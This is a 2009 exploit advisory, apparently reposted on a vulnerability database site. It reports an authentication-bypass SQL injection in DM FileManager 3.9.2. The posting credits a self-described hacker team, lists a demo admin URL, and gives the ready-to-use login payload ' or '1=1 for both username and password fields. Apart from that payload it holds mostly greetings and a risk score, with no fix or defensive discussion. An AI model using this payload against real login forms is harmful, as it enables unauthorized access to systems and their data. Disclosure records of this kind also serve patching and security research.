DM FileManager 3.9.2 (Auth Bypass) SQL Injection Vulnerability

🗓️ 20 May 2009 00:00:00Reported by RootType

DM FileManager 3.9.2 (Auth Bypass) SQL Injection Vulnerability discovered by Snakespc the Algerian Hacke


                                                -------------------------AllaH AkbaR-------------------------------
dm-filemanager (Auth Bypass) Remote Sql Injection
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Mail: [email protected]
Site:http://www.snakespc.com/sc/index.php
Chi3arona houa :  Serra7 merra7 , koulchi mderra7&gt;&gt;&gt;&gt;
             Aflawa Kamikaz Wa4rin Fi kol Bla4s 
-------------------------SNAKES TEAM-------------------------------------
http://dutchmonkey.com/products/dm-filemanager/demo/admin
-------------------------SNAKES TEAM-------------------------------------
Exploit:
-----------
Username:   ' or '1=1
Password:   ' or '1=1
-------------------------SNAKES TEAM-------------------------------------
His0k4:::Mr.HCOCA_MAN:::DrEaDFuL:::
yassine_enpsunhouse2:::aSSaSSin_HaCkErS:::
THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
--------------------------SNAKES TEAM------------------------------------
ALL www.SnakespC.com/sc&gt;&gt;&gt;&gt; (  Members )
Str0ke &gt;&gt;&gt;&gt;&gt;&gt;&gt;Milw0rm

20 May 2009 00:00Current

7.1High risk

Vulners AI Score7.1